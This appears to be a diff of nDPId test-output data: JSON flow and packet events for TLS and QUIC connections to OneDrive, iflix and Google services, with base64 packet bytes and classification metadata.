{"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} 
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495749875,"flow_last_seen":1646495749875,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495749875,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1646495749875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495749875,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8bgJAAEAGHN3AqAGAgeJr0q\/WAbvpKcA1AAAAAKAC+vDq5gAAAgQFtAQCCAoyACVaAAAAAAEDAwc="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1646495750196,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495750196,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAAC8Gm+eB4mvSwKgBgAG7r9bNFCqu6SnANoASOQgzewAAAgQFoAEBBAIBAwMH"} 01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1646495750202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495750202,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItbgRAAEAGGurAqAGAgeJr0q\/WAbvpKcA2zRQqr1AYAfYZ+QAAFgMBAgABAAH8AwMSMXO4WcNq177CYxST5Cayi57AGXeQdEMNPed0f\/vO+CBsnRDIIeROJeOlCByvk7lr9pRUbeR06Cs4dVzQT0oYEAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuaWZsaXguY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOmUL4m7jSQuaHGCv6++\/yOU0VJCaPyexIMcIsguXG5nABcAQQTHBHql0\/iCD7AqH7jE0qyA2MF\/+\/iD9HNmfv2msqiXNFGoZilNx52dlYpSngcjMahYCZatuJxecuXUWxhAYPfzACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} 
+00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1646495785326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785326,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARxpLAqAGA2DrUjpbyAbsFVWFvygAAAAEIEaJhA\/pmmGIDGZVnAEJ9k4MXlQzkENByBWBPG6JdLnJ97tZTge\/8kX\/RhzOqc4jakqIni2HiqmCs6hTSmZEhkbOUs3lvKsO9F9+XIhOeXqIykOCxzeDPOvDHVnxP2ftNUD1lroHjevW4+JYs\/R0VPIgtCayG\/meCf7Lef9QhWL6YQmXx48ui2W6tYfyIEiaXDMtExoqL+hacVg2HpNlIwJe4PE0\/HEg3ezCS0HD8j4RVM2gk+MitT95qpQmfRz8ntx5WznfpVZvMxU23bid9\/dO3KP4LRTXApe0VNoqcMS8eAgkUyCgd5nSQ87LPgFqnkCEFratISm41sDhhr7ve32C1I\/TlAIhgBRfW87C3WFDVCBagaYOeonExydEo\/D28evz\/tjH6aV7xu0wNblTQywt3lynmNkuwCW7cnmeQuau6oQOA9GiSOfN51L3rFmCObunfGa2ezZE4y2FjFlEEKO\/QIf2CassSbDJm49YK5w7PoSq58kn\/6qIb0Tn5xVj\/LonVQw1HAkNmcP8ql0C7shrF43UdoYXvT\/hOCOA\/VAd6JiIod3M38vXNHkTBOnLJf9TfjJE64UfVXvq5UqVG0r6WldLJGu2xtNgpeDi11dyXdfvaPJX4DN1wutu28hbCiIktfSp6wZpMBmAyygGuO73TqglRovt2xSE4EHwrJMCD4O2TYEurb9uUa0gMyyJFr9\/L+BwLQIYk52z2VLzFmq3EMYlrlu4r\/zm7z83+qa7ryx2Qegl3wdMjyEciWgqgcac28uJhD3lOGWLmvmFxM9fEY1jJKzrVnaWs\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"} 
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"hangouts.google.com","version":"TLSv1.3","alpn":"h3","ja3":"2a18e6bf307f97c5e27f0ab407dc65db","tls_supported_versions":"TLSv1.3"}} +00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"hangouts.google.com","version":"TLSv1.3","alpn":"h3","ja3":"2a18e6bf307f97c5e27f0ab407dc65db","tls_supported_versions":"TLSv1.3"}} 
02279{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1646495785351,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785351,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMR0xLYOtSOwKgBgAG7lvIFVdbOwgAAAAEDGZVnCBGiYQP6ZphiAEPst9JjIfZ6zFXkACoVjtJE04mEvUBO80J9CXDI1AzGWloBOqzPXI+URdYvHEecgUeYllSRgTGQ\/pdzmzfdkga4V0DlNh9sMthgcZTrWfMiNpOkeHh+8VGEpoSOyr5bTtr6qKEGYg7ZZM+3g8CNri4\/Y4rmU\/u2ucvFt3wUyTEBNlGlntUryhGUoERRNT55NmFJqVuhU\/GueMTfSHsKfOOCMhdksMgHmrVyRumUWVrccMpyqwcE3vpmgCs+uFNthYNXlEj8FMdYAA6FIKpTcrXTgZ3Nm3DRRlDCt76rYa9Ed5zm8JxO+MhvWTGGpqVfgXpQEWyeWMNxG693XFsxTB07PJ3\/YeWP9LrYnM2HgdinrEmJ9dHI16vwi5FQ0cWQJ92cHEvIGKGiq8SA5HEgTnQVmdK2xOmx7dj0KaicL3ol58t8ltkbIXgfkxYhp5yyTHcH3z0UKdCT7GAS6tTRIUS1R7xH75rixlq6B8ZSkGHfajnn6P2ZcdZ\/x0f91Ed0FleO4gdbHHIHetNxBiPPjmSYid1gKObR53SjxAV83g\/W5uVBPG0cabwLojDjBF4yItmMF8ard0uchzKjL7+VPzEBpyA8VAKvlvVbjeonWQ9zdLjCu+3DI5DnZF04lHG772bPMCDbbp1L2TwHKUlogQBjbGpHA7cGqXQ+7rgXzsp8A1LJ4M7UOfhwAhpEZinbjHrtptlKXt3FIxug5QT3rZRFmRCTzNoEN+lueCUbvABz5ahUadsFXVwk+QV6y6OfittlgN9FPzvu2wbXQsdpR7HuGw5be5n5hrjM\/gt9Cn1qYtj8W7tpYyeOF6J2KVyL\/JC\/QJoDFTRmNJOaSu8I9GPipG+PZyHfbkz460Q5SYy9J6Yty8H0OpgvMOxAZyJfdY6HpBJ73a3hMG\/oeLH2XJGbp7tfnJSbIrw7OjnmUjZjC3QFC5ZT\/D9lfLZQtLioZhFU2dvfGzIgp3e6A6JbEE0vFluuvChl2C+0rBUUI4BDQaLDC36yd\/nqeU9YkBNuGMLNwmS1nu9FZU8mcDANqVoY5yVLg2kamNS5X1hNq7e0ZttiC++uqF2vAilhDlKm4Sn9UjPckZuiZBomYpyg0Mx2VTEwtpKds6MA+UAswT6IhWCQVBWewjai+fOWFc9I1PVuJXv6wszew3Hcqcb00f6u5LLpYQLzSeihJuZrVlM1j6lGBHe0EhJ6DL1teURdZuXWHdzyDqDjp983xiqcs411z8ivoxsAQrnJoCWJxd7jZsORlrj+qRu70MzdRwWows6Ir5D2WLnk\/xr5xZXlxc0qq35KzQxuScxBBYPpS5ZzPphWbiD4nd3CHT+adzTjAAAAAQMZlWcIEaJhA\/pmmGJA9VVpI4dKlmrgeF\/YggQi8sjf99E3nv5OtPvRrtZcyuW01yoBM35YdPwOsg50xXr\/BiQRHRmpg5AI\/Gxv40hVq1L2PZoVADVhqqGncF1oScVHTbM9W4m3oXbHay1EHfQ5lAWTWpN49l9Tiv7IrVg
j7Dp+73Bh+\/I4be++4+GN0yWQOqn0T+ijD3iAvjW07u4KFggANU2wFU17wsvlJuMqKoty0iSiIcZD1Fpv8YeBupA3Jd5TcFAQxL\/\/amaXv8CyobSjSega7I6w3iSVpXXusfvcoL9IwMGqCbpjl4yujE+\/2nPBKVvs4iEZolT1zqdJU8Q5tR5vWxmVZ56Vkqmz6hVG35AqABKCyEo\/gk\/PneTs58wsy3Z+6AWG31mbKVGDVWKfuUivH9e1GriPy0Y1T2Vi68\/VxrxY\/w=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495836963,"flow_last_seen":1646495836963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495836963,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1646495836963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836963,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8O4hAAEAG9ELAqAGAjvq5zsWwAbtVp40sAAAAAKAC+vA0nQAAAgQFtAQCCApsJfcbAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1646495836979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836979,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8r34AAHIGjcyO+rnOwKgBgAG7xbDcn6Z3VaeNLaAS\/\/\/zpwAAAgQFlgQCCApyIEa6bCX3GwEDAwg="} 
01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1646495836983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495836983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5O4pAAEAG8kPAqAGAjvq5zsWwAbtVp40t3J+meIAYAfYRowAAAQEICmwl9zByIEa6FgMBAgABAAH8AwOIf7nJ5breQpxi5aty74p4A0tH8s+YhJ7uQwoAchgbeyDiYRrjyIJgoj6ghTCikRuTluEoGumBBaOR1N7eUGiD\/gAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5nb29nbGVwbHVzLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBQQOMOQqFJCXmUicpi9d2kYaSiqPqeBjWpdYiUO92OBgAXAEEEwEm0an4CaV7UYrRD1yMS8F4iZzs0QylP5VOKPX+Fji27U1gjEJPJGZS7PVMPfJS0GsqWWRpHV\/lDyKacoCtA0wArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 